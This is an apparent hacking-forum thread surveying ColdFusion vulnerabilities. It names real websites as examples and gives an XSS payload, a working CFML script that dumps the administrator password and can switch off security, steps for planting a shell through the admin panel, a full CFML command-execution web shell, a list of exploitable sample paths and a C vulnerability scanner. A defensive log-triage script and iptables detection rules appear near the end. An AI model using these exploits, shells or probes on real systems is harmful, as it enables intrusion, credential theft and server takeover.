[ Overview of CFM (ColdFusion) vulnerabilities ]

27.05.2008, 14:44
Members of Antichat - Level 5
Registered: 23.08.2007
Posts: 417
Reputation: 3908
Path disclosure
Request from a server running under IIS a file whose name is an MS-DOS device name (nul, prn, aux, lpt1) with the extension .dbm.
Example:
http://www.zogby.com/nul.dbm
Access to debugging information
Append ?mode=debug to the script.
Example:
http://www.zogby.com/News/ReadNews.dbm?mode=debug
Access to the administrator panel
If the admin has not disabled access to ColdFusion Administrator from IP addresses other than 127.0.0.1, you can reach the login form; only a password has to be entered.
Example:
http://www.zogby.com/CFIDE/administrator/index.cfm
Installation path disclosure in Macromedia ColdFusion MX
Request /CFIDE/probe.cfm on port 8500.
Example:
http://www.site.com:8500/CFIDE/probe.cfm
XSS in ColdFusion Fusebox
index.cfm?fuseaction=XSS
Example:
http://www.proinno-europe.eu/index.cfm?fuseaction="><script>alert('Antichat')</script>
Administrator password disclosure
The vulnerability was found in ColdFusion MX. A remote authenticated user who is able to create ColdFusion templates can obtain the administrator password. A remote authenticated user with the privilege to create templates containing the CreateObject and cfobject tags can write a template that reads the administrator password.
Example:
Code:
<cfscript>
objFileWriter = CreateObject("java","java.io.FileWriter");
objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");
objJavaC = CreateObject("java","sun.tools.javac.Main");
objString = CreateObject("java","java.lang.String");
objFile = CreateObject("java","java.io.File");
if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }
strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";
strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";
strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";
strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";
fileWriter = objFileWriter.init("#strJavaSource#",false);
fileWriter.write("import coldfusion.security.SecurityManager;");
fileWriter.write("import java.io.File;");
fileWriter.write("public class SecurityExploit extends SecurityManager {");
fileWriter.write("public SecurityExploit(File arg0, File arg1) {");
fileWriter.write("super(arg0, arg1); }");
fileWriter.write("public boolean isAdminSecurityEnabled(){");
fileWriter.write("return false;}}");
fileWriter.flush();
fileWriter.close();
str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");
strArr = str.split(",");
byteArray = objByteArray.init();
compileObj = objJavaC.init(byteArray,str);
compileObj.compile(strArr);
obj = CreateObject("java","SecurityExploit");
file1 = objFile.init("#strNeoSecFile#");
file2 = objFile.init("#strPasswdFile#");
obj.init(file1,file2);
obj.load();
</cfscript>
<cfscript>
// Get Administrator Password
strAdminPw = obj.getAdminPassword();
// Set Administrator Password
//obj.setAdminPassword("test123");
// Turn off Sandbox Security
//obj.setSandboxSecurityEnabled(false);
// Turn off Administrator Login
//obj.setAdminSecurityEnabled(false);
// Turn off RDS Login
//obj.setRdsSecurityEnabled(false);
// Set RDS Password
//obj.setRdsPassword("test123");
// Turn off JVM Security
//obj.setJvmSecurityEnabled(false);
</cfscript>
<cfoutput>Administrator Password: #strAdminPw#
</cfoutput>
Uploading a shell from the admin panel
I.
If the server runs IIS, go to the Server -> Server Settings -> Settings tab, set Error Template to the link to the shell, then request a non-existent page on the server and the shell will run.
II.
Go to the Server -> Automated Tasks -> Schedule Task tab, click Add Scheduled Task and enter a task name. The Operation field must be set to HTTPRequest. Put the link to the shell in the URL field, then under Publish tick Save output to a file. Specify the path and name of the output file on the server.
Shell:
Code:
<html>
<body>
<cfoutput>
<table>
<form method="POST" action="cfexec.cfm">
<tr>
<td>Command:</td>
<td><input type=text name="cmd" size=50 <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td>
</tr>
<tr>
<td>Options:</td>
<td><input type=text name="opts" size=50 <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td>
</tr>
<tr>
<td>Timeout:</td>
<td><input type=text name="timeout" size=4 <cfif isdefined("form.timeout")>value="#form.timeout#"<cfelse>value="5"</cfif>></td>
</tr>
</table>
<input type=submit value="Exec">
</form>
<cfsavecontent variable="myVar">
<cfexecute name="#Form.cmd#" arguments="#Form.opts#" timeout="#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>
I will gradually add vulnerabilities to the overview; fortunately there are plenty of them.

27.05.2008, 14:51
Local include
Macromedia ColdFusion ships with several small "helper" applications that are meant to teach users how to work with ColdFusion. These applications are not installed by default, and Macromedia recommends not installing them on a production server. Some of them contain a vulnerability that lets an attacker create files or execute commands on the vulnerable server.
Interesting locations
/cd/../config/html/cnf_gi.htm
/cfappman/index.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelvel/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/MOLE.CFM
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/setlocale.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/TOXIC.CFM
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfide/Administrator/startstop.html
/cfmlsyntaxcheck.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
Scanners:
Code:
/* CrAzY ScAn by Asmbeginer.com */
/* cc -o crazy crazy.c */
/* ./crazy 127.0.0.1 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long counter;
int count=0;
int ntcheck;
char ntbuff[1024];
/* request lines to try; slots 1..139 are filled below, slot 0 stays unused */
char *buff[140];
buff[1] = "GET /cfdocs/zero.cfm HTTP/1.0\n\n";
buff[2] = "GET /cfdocs/root.cfm HTTP/1.0\n\n";
buff[3] = "GET /cfdocs/expressions.cfm HTTP/1.0\n\n";
buff[4] = "GET /cfdocs/TOXIC.CFM HTTP/1.0\n\n";
buff[5] = "GET /cfdocs/MOLE.CFM HTTP/1.0\n\n";
buff[6] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";
buff[7] = "GET /cfdocs/expeval/sendmail.cfm HTTP/1.0\n\n";
buff[8] = "GET /cfdocs/expeval/eval.cfm HTTP/1.0\n\n";
buff[9] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
buff[10] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
buff[11] = "GET /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\n\n";
/* the backslash must be escaped: "\b" in a C string is a backspace, not a path separator */
buff[12] = "GET /cfdocs/exampleapp/email/getfile.cfm?filename=c:\\boot.ini HTTP/1.0\n\n";
buff[13] = "GET /cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.0\n\n";
buff[14] = "GET /cfdocs/exampleapp/email/application.cfm HTTP/1.0\n\n";
buff[15] = "GET /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\n\n";
buff[16] = "GET /cfdocs/examples/parks/detail.cfm HTTP/1.0\n\n";
buff[17] = "GET /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\n\n";
buff[18] = "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\n\n";
buff[19] = "GET /cfdocs/snippets/viewexample.cfm HTTP/1.0\n\n";
buff[20] = "GET /cfdocs/snippets/gettempdirectory.cfm HTTP/1.0\n\n";
buff[21] = "GET /cfdocs/snippets/fileexists.cfm HTTP/1.0\n\n";
buff[22] = "GET /cfdocs/snippets/evaluate.cfm HTTP/1.0\n\n";
buff[23] = "GET /cfappman/index.cfm HTTP/1.0\n\n";
buff[24] = "GET /cfusion/cfapps/forums/forums_.mdb HTTP/1.0\n\n";
buff[25] = "GET /cfusion/cfapps/security/realm_.mdb HTTP/1.0\n\n";
buff[26] = "GET /cfusion/cfapps/forums/data/forums.mdb HTTP/1.0\n\n";
buff[27] = "GET /cfusion/cfapps/security/data/realm.mdb HTTP/1.0\n\n";
buff[28] = "GET /cfusion/database/cfexamples.mdb HTTP/1.0\n\n";
buff[29] = "GET /cfusion/database/cfsnippets.mdb HTTP/1.0\n\n";
buff[30] = "GET /cfusion/database/smpolicy.mdb HTTP/1.0\n\n";
buff[31] = "GET /cfusion/database/cypress.mdb HTTP/1.0\n\n";
buff[32] = "GET /DataBase/ HTTP/1.0\n\n";
buff[33] = "GET /database.nsf/e1466a8590/6048076233?OpenDocument HTTP/1.0\n\n";
buff[34] = "GET /database.nsf/e146fa8590/6148076233?EditDocument HTTP/1.0\n\n";
buff[35] = "GET /database.nsf/e146fa8590/6148076233?DeleteDocument HTTP/1.0\n\n";
buff[36] = "GET /domcfg.nsf/?open HTTP/1.0\n\n";
buff[37] = "GET /domcfg.nsf/URLRedirect/?OpenForm. HTTP/1.0\n\n";
buff[38] = "GET /domcfg.nsf/ HTTP/1.0\n\n";
buff[39] = "GET /domlog.nsf/ HTTP/1.0\n\n";
buff[40] = "GET /log.nsf/ HTTP/1.0\n\n";
buff[41] = "GET /catalog.nsf/ HTTP/1.0\n\n";
buff[42] = "GET /names.nsf/ HTTP/1.0\n\n";
buff[43] = "GET /database.nsf/ HTTP/1.0\n\n";
buff[44] = "GET /today.nsf/ HTTP/1.0\n\n";
buff[45] = "GET /cgi-bin/cgi-lib.pl HTTP/1.0\n\n";
buff[46] = "GET /cgi-bin/imagemap.c HTTP/1.0\n\n";
buff[47] = "GET /cgi-bin/imagemap.exe HTTP/1.0\n\n";
buff[48] = "GET /cgi-bin/minimal.exe HTTP/1.0\n\n";
buff[49] = "GET /cgi-bin/redir.exe HTTP/1.0\n\n";
buff[50] = "GET /cgi-bin/stats.prg HTTP/1.0\n\n";
buff[51] = "GET /cgi-bin/statsconfig HTTP/1.0\n\n";
buff[52] = "GET /cgi-bin/visadmin.exe HTTP/1.0\n\n";
buff[53] = "GET /cgi-bin/visitor.exe HTTP/1.0\n\n";
buff[54] = "GET /cgi-bin/htmldocs HTTP/1.0\n\n";
buff[55] = "GET /cgi-bin/logs HTTP/1.0\n\n";
buff[56] = "GET /scripts/ HTTP/1.0\n\n";
buff[57] = "GET /Default.asp HTTP/1.0\n\n";
buff[58] = "GET /_vti_bin HTTP/1.0\n\n";
buff[59] = "GET /_vti_bin/_vti_adm HTTP/1.0\n\n";
buff[60] = "GET /_vti_bin/_vti_aut HTTP/1.0\n\n";
buff[61] = "GET /srchadm HTTP/1.0\n\n";
buff[62] = "GET /iisadmin HTTP/1.0\n\n";
buff[63] = "GET /_AuthChangeUrl? HTTP/1.0\n\n";
buff[64] = "GET /_vti_inf.html HTTP/1.0\n\n";
buff[65] = "GET /?PageServices HTTP/1.0\n\n";
buff[66] = "GET /html/?PageServices HTTP/1.0\n\n";
buff[67] = "GET /scripts/cpshost.dll HTTP/1.0\n\n";
buff[68] = "GET /scripts/uploadn.asp HTTP/1.0\n\n";
buff[69] = "GET /scripts/uploadx.asp HTTP/1.0\n\n";
buff[70] = "GET /scripts/upload.asp HTTP/1.0\n\n";
buff[71] = "GET /scripts/repost.asp HTTP/1.0\n\n";
buff[72] = "GET /scripts/postinfo.asp HTTP/1.0\n\n";
buff[73] = "GET /scripts/run.exe HTTP/1.0\n\n";
buff[74] = "GET /scripts/iisadmin/bdir.htr HTTP/1.0\n\n";
buff[75] = "GET /scripts/iisadmin/samples/ctgestb.htx HTTP/1.0\n\n";
buff[76] = "GET /scripts/iisadmin/samples/ctgestb.idc HTTP/1.0\n\n";
buff[77] = "GET /scripts/iisadmin/samples/details.htx HTTP/1.0\n\n";
buff[78] = "GET /scripts/iisadmin/samples/details.idc HTTP/1.0\n\n";
buff[79] = "GET /scripts/iisadmin/samples/query.htx HTTP/1.0\n\n";
buff[80] = "GET /scripts/iisadmin/samples/query.idc HTTP/1.0\n\n";
buff[81] = "GET /scripts/iisadmin/samples/register.htx HTTP/1.0\n\n";
buff[82] = "GET /scripts/iisadmin/samples/register.idc HTTP/1.0\n\n";
buff[83] = "GET /scripts/iisadmin/samples/sample.htx HTTP/1.0\n\n";
buff[84] = "GET /scripts/iisadmin/samples/sample.idc HTTP/1.0\n\n";
buff[85] = "GET /scripts/iisadmin/samples/sample2.htx HTTP/1.0\n\n";
buff[86] = "GET /scripts/iisadmin/samples/viewbook.htx HTTP/1.0\n\n";
buff[87] = "GET /scripts/iisadmin/samples/viewbook.idc HTTP/1.0\n\n";
buff[88] = "GET /scripts/iisadmin/tools/ct.htx HTTP/1.0\n\n";
buff[89] = "GET /scripts/iisadmin/tools/ctss.idc HTTP/1.0\n\n";
buff[90] = "GET /scripts/iisadmin/tools/dsnform.exe HTTP/1.0\n\n";
buff[91] = "GET /scripts/iisadmin/tools/getdrvrs.exe HTTP/1.0\n\n";
buff[92] = "GET /scripts/iisadmin/tools/mkilog.exe HTTP/1.0\n\n";
buff[93] = "GET /scripts/iisadmin/tools/newdsn.exe HTTP/1.0\n\n";
buff[94] = "GET /IISADMPWD/achg.htr HTTP/1.0\n\n";
buff[95] = "GET /IISADMPWD/aexp.htr HTTP/1.0\n\n";
buff[96] = "GET /IISADMPWD/aexp2.htr HTTP/1.0\n\n";
buff[97] = "GET /IISADMPWD/aexp2b.htr HTTP/1.0\n\n";
buff[98] = "GET /IISADMPWD/aexp3.htr HTTP/1.0\n\n";
buff[99] = "GET /IISADMPWD/aexp4.htr HTTP/1.0\n\n";
buff[100] = "GET /IISADMPWD/aexp4b.htr HTTP/1.0\n\n";
buff[101] = "GET /IISADMPWD/anot.htr HTTP/1.0\n\n";
buff[102] = "GET /IISADMPWD/anot3.htr HTTP/1.0\n\n";
buff[103] = "GET /_vti_pvt/writeto.cnf HTTP/1.0\n\n";
buff[104] = "GET /_vti_pvt/svcacl.cnf HTTP/1.0\n\n";
buff[105] = "GET /_vti_pvt/services.cnf HTTP/1.0\n\n";
buff[106] = "GET /_vti_pvt/service.stp HTTP/1.0\n\n";
buff[107] = "GET /_vti_pvt/service.cnf HTTP/1.0\n\n";
buff[108] = "GET /_vti_pvt/access.cnf HTTP/1.0\n\n";
buff[109] = "GET /_private/registrations.txt HTTP/1.0\n\n";
buff[110] = "GET /_private/registrations.htm HTTP/1.0\n\n";
buff[111] = "GET /_private/register.txt HTTP/1.0\n\n";
buff[112] = "GET /_private/register.htm HTTP/1.0\n\n";
buff[113] = "GET /_private/orders.txt HTTP/1.0\n\n";
buff[114] = "GET /_private/orders.htm HTTP/1.0\n\n";
buff[115] = "GET /_private/form_results.htm HTTP/1.0\n\n";
buff[116] = "GET /_private/form_results.txt HTTP/1.0\n\n";
buff[117] = "GET /admisapi/fpadmin.htm HTTP/1.0\n\n";
buff[118] = "GET /scripts/Fpadmcgi.exe HTTP/1.0\n\n";
buff[119] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n";
buff[120] = "GET /_vti_bin/_vti_aut/author.dll HTTP/1.0\n\n";
buff[121] = "GET /_vti_bin/_vti_adm/admin.dll HTTP/1.0\n\n";
buff[122] = "GET /msads/Samples/selector/showcode.asp HTTP/1.0\n\n";
buff[123] = "GET /scripts/perl? HTTP/1.0\n\n";
buff[124] = "GET /scripts/proxy/w3proxy.dll HTTP/1.0\n\n";
buff[125] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n";
buff[126] = "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n";
buff[127] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
buff[128] = "GET /AdvWorks/equipment/catalog_type.asp HTTP/1.0\n\n";
buff[129] = "GET /scripts/iisadmin/default.htm HTTP/1.0\n\n";
buff[130] = "GET /msadc/samples/adctest.asp HTTP/1.0\n\n";
buff[131] = "GET /msadc/msadcs.dll HTTP/1.0\n\n";
buff[132] = "GET /adsamples/config/site.csc HTTP/1.0\n\n";
buff[133] = "GET /scripts/../../cmd.exe HTTP/1.0\n\n";
buff[134] = "GET /scripts/cpshost.dll HTTP/1.0\n\n";
buff[135] = "GET /scripts/convert.bas HTTP/1.0\n\n";
buff[136] = "GET .html/...... HTTP/1.0\n\n";
buff[137] = "GET /publisher/ HTTP/1.0\n\n";
buff[138] = "GET ..../Windows/Admin.pwl HTTP/1.0\n\n";
buff[139] = "GET ....../......ida/con HTTP/1.0\n\n";
/* exactly one argument (the host); the original accepted zero and then dereferenced argv[1] */
if (argc != 2)
{
printf("\nusage : %s host\n",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
/* one connection per request: HTTP/1.0 servers close the socket after each reply.
   Indices run 1..139; the original "while(count++ < 140)" read buff[140], one past the array. */
for (count = 1; count < 140; count++)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
{
perror("socket");
exit(1);
}
memset(&sin, 0, sizeof(sin));
memcpy(&sin.sin_addr, he->h_addr_list[0], he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
close(sock);
continue;
}
for(ntcheck=0; ntcheck < 1024; ntcheck++)
{
ntbuff[ntcheck] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
/* keep one byte for the terminating NUL and report only the status line of the reply */
if (recv(sock,ntbuff, sizeof(ntbuff)-1,0) > 0)
{
ntbuff[strcspn(ntbuff, "\r\n")] = '\0';
printf("%.*s -> %s\n", (int)strcspn(buff[count], "\n"), buff[count], ntbuff);
}
close(sock);
}
return 0;
}
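Added example, not from the thread: a small Python access-log triage script for the request patterns described in the first two posts, i.e. MS-DOS device names with a .dbm extension, ?mode=debug, /CFIDE/administrator/ requests from anything other than the loopback address, the sample/docs application paths listed above, .mdb downloads and script tags in fuseaction. The log lines, the prefix subset of the path list and the finding names are constructed for the example; "con" is added to the device-name set as a further well-known device name. The request target is percent-decoded twice and lower-cased before matching, because a case-sensitive raw substring rule (the approach taken by the iptables string-match rules posted below) does not see /CFIDE/Administrator/ or /%43FIDE/ as the same path.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed subset of the "interesting locations" list; prefixes keep the check short.
SAMPLE_APP_PREFIXES = ("/cfdocs/", "/cfappman/", "/cfusion/", "/cfide/probe.cfm")
ADMIN_PREFIX = "/cfide/administrator/"
LOCAL_ADMIN_SOURCES = {"127.0.0.1", "::1"}
DOS_DEVICES = {"nul", "prn", "aux", "lpt1", "con"}  # "con" added beyond the post's list

# Common log format: client ip, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(target):
    """Percent-decode twice (double encoding), lower-case and unify slashes.

    Matching on the raw request, as a per-packet iptables string rule does,
    is case-sensitive and never decodes %XX escapes, so trivially rewritten
    paths slip past it; normalising first removes that gap."""
    decoded = unquote(unquote(target))
    parts = urlsplit(decoded)
    path = parts.path.replace("\\", "/").lower()
    return path, parts.query.lower()


def classify(ip, target):
    """Return the list of finding names that apply to one request."""
    path, query = normalize(target)
    findings = []
    if path.startswith(ADMIN_PREFIX) and ip not in LOCAL_ADMIN_SOURCES:
        findings.append("cf-admin-remote")
    if "mode=debug" in query:
        findings.append("cf-debug-mode")
    stem, dot, _ext = path.rsplit("/", 1)[-1].partition(".")
    if dot and stem in DOS_DEVICES:
        findings.append("iis-dos-device-name")
    if any(path.startswith(p) for p in SAMPLE_APP_PREFIXES):
        findings.append("cf-sample-app")
    if path.endswith(".mdb"):
        findings.append("access-db-download")
    if "fuseaction=" in query and ("<" in query or ">" in query):
        findings.append("cf-xss-probe")
    return findings


def triage(lines):
    """Yield (ip, target, findings) for every parseable line that matched a check."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format: skip rather than crash
        findings = classify(m["ip"], m["target"])
        if findings:
            hits.append((m["ip"], m["target"], tuple(findings)))
    return hits


# Constructed log excerpt modelled on the probes in the thread.
SAMPLE_LOG = r'''10.0.0.5 - - [27/May/2008:14:44:01 +0400] "GET /nul.dbm HTTP/1.0" 500 412
10.0.0.5 - - [27/May/2008:14:44:02 +0400] "GET /News/ReadNews.dbm?mode=debug HTTP/1.0" 200 9120
10.0.0.5 - - [27/May/2008:14:44:03 +0400] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 3311
127.0.0.1 - - [27/May/2008:14:44:04 +0400] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 3311
10.0.0.5 - - [27/May/2008:14:44:05 +0400] "GET /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini HTTP/1.0" 200 298
10.0.0.5 - - [27/May/2008:14:44:06 +0400] "GET /%43%46%49%44%45/Administrator/startstop.html HTTP/1.1" 403 0
10.0.0.5 - - [27/May/2008:14:44:07 +0400] "GET /index.cfm?fuseaction=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1502
10.0.0.5 - - [27/May/2008:14:44:08 +0400] "GET /cfusion/database/cfexamples.mdb HTTP/1.0" 200 65536
10.0.0.5 - - [27/May/2008:14:44:09 +0400] "GET /index.cfm?fuseaction=home HTTP/1.1" 200 1502
not a log line'''

if __name__ == "__main__":
    for ip, target, findings in triage(SAMPLE_LOG.splitlines()):
        print(f"{ip} {target} -> {', '.join(findings)}")
```

The loopback request to the administrator and the plain fuseaction=home request produce no finding, which is the point of keeping the source address and the decoded query in the decision rather than matching on a path substring alone.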
27.05.2008, 14:54
Code:
#!/bin/bash
#Copyright 2003 William Stearns <wstearns@pobox.com>
#Released under the GPL.
#ZZZZ Check Me and MyVersion
Me='snort-web-coldfusion'
MyVersion='20031125'
#DefaultActions=''
[ -r /etc/firebricks/firebricks.conf ] && . /etc/firebricks/firebricks.conf
[ -r /etc/firebricks/$Me.conf ] && . /etc/firebricks/$Me.conf
[ -r ${FBLibDir:-'/usr/lib/firebricks/'}/firebrickslib ] && . ${FBLibDir:-'/usr/lib/firebricks/'}/firebrickslib
if [ -z "$FBLibVer" ]; then
echo 'It looks like firebrickslib was not loaded, why? Exiting' >&2
exit 1
fi
for OneTask in $Tasks ; do
case "$OneTask" in
link)
$IptablesBin -N $Me >/dev/null 2>&1
#ZZZZ try to restrict the following three to only send down what the chain needs to inspect.
$IptablesBin $AppIn INPUT -i \! lo -j $Me
$IptablesBin $AppIn FORWARD -j $Me
$IptablesBin $AppIn OUTPUT -j $Me
;;
unlink)
#ZZZZ Make the same changes as above (such as "-p tcp"), but if you cut and paste, note "$AppIn" is now "-D"
$IptablesBin -D INPUT -i \! lo -j $Me
$IptablesBin -D FORWARD -j $Me
$IptablesBin -D OUTPUT -j $Me
$IptablesBin -X $Me >/dev/null 2>&1
;;
create)
echo "Starting $Me" >&2
FlushOrNewChain $Me
LogAs="SID903" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfcache.map"' $Tail # '"WEB-COLDFUSION cfcache.map access"' nocase-ignored bugtraq,917 cve,CVE-2000-0057 classtype:attempted-recon sid:903
LogAs="SID904" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/email/application.cfm"' $Tail # '"WEB-COLDFUSION exampleapp application.cfm"' nocase-ignored bugtraq,1021 classtype:attempted-recon sid:904
LogAs="SID905" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/publish/admin/application.cfm"' $Tail # '"WEB-COLDFUSION application.cfm access"' nocase-ignored bugtraq,1021 classtype:attempted-recon sid:905
LogAs="SID906" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/email/getfile.cfm"' $Tail # '"WEB-COLDFUSION getfile.cfm access"' nocase-ignored bugtraq,229 classtype:attempted-recon sid:906
LogAs="SID907" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/publish/admin/addcontent.cfm"' $Tail # '"WEB-COLDFUSION addcontent.cfm access"' nocase-ignored classtype:attempted-recon sid:907
LogAs="SID908" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfide/administrator/index.cfm"' $Tail # '"WEB-COLDFUSION administrator access"' nocase-ignored cve,CVE-2000-0538 classtype:attempted-recon sid:908
LogAs="SID909" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_SETDATASOURCEUSERNAME()"' $Tail # '"WEB-COLDFUSION datasource username attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:909
LogAs="SID910" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/fileexists.cfm"' $Tail # '"WEB-COLDFUSION fileexists.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:910
LogAs="SID911" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/exprcalc.cfm"' $Tail # '"WEB-COLDFUSION exprcalc access"' nocase-ignored cve,CVE-1999-0455 bugtraq,550 classtype:attempted-recon sid:911
LogAs="SID912" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/parks/detail.cfm"' $Tail # '"WEB-COLDFUSION parks access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:912
LogAs="SID913" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfappman/index.cfm"' $Tail # '"WEB-COLDFUSION cfappman access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:913
LogAs="SID914" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/cvbeans/beaninfo.cfm"' $Tail # '"WEB-COLDFUSION beaninfo access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:914
LogAs="SID915" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/evaluate.cfm"' $Tail # '"WEB-COLDFUSION evaluate.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:915
LogAs="SID916" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_GETODBCDSN()"' $Tail # '"WEB-COLDFUSION getodbcdsn access"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:916
LogAs="SID917" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_DBCONNECTIONS_FLUSH()"' $Tail # '"WEB-COLDFUSION db connections flush attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:917
LogAs="SID918" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/"' $Tail # '"WEB-COLDFUSION expeval access"' nocase-ignored bugtraq,550 cve,CAN-1999-0477 classtype:attempted-user sid:918
LogAs="SID919" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_SETDATASOURCEPASSWORD()"' $Tail # '"WEB-COLDFUSION datasource passwordattempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:919
LogAs="SID920" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_ISCOLDFUSIONDATASOURCE()"' $Tail # '"WEB-COLDFUSION datasource attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:920
LogAs="SID921" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_ENCRYPT()"' $Tail # '"WEB-COLDFUSION admin encrypt attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:921
LogAs="SID922" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/displayopenedfile.cfm"' $Tail # '"WEB-COLDFUSION displayfile access"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:922
LogAs="SID923" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_GETODBCINI()"' $Tail # '"WEB-COLDFUSION getodbcin attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:923
LogAs="SID924" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_DECRYPT()"' $Tail # '"WEB-COLDFUSION admin decrypt attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:924
LogAs="SID925" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/mainframeset.cfm"' $Tail # '"WEB-COLDFUSION mainframeset access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:925
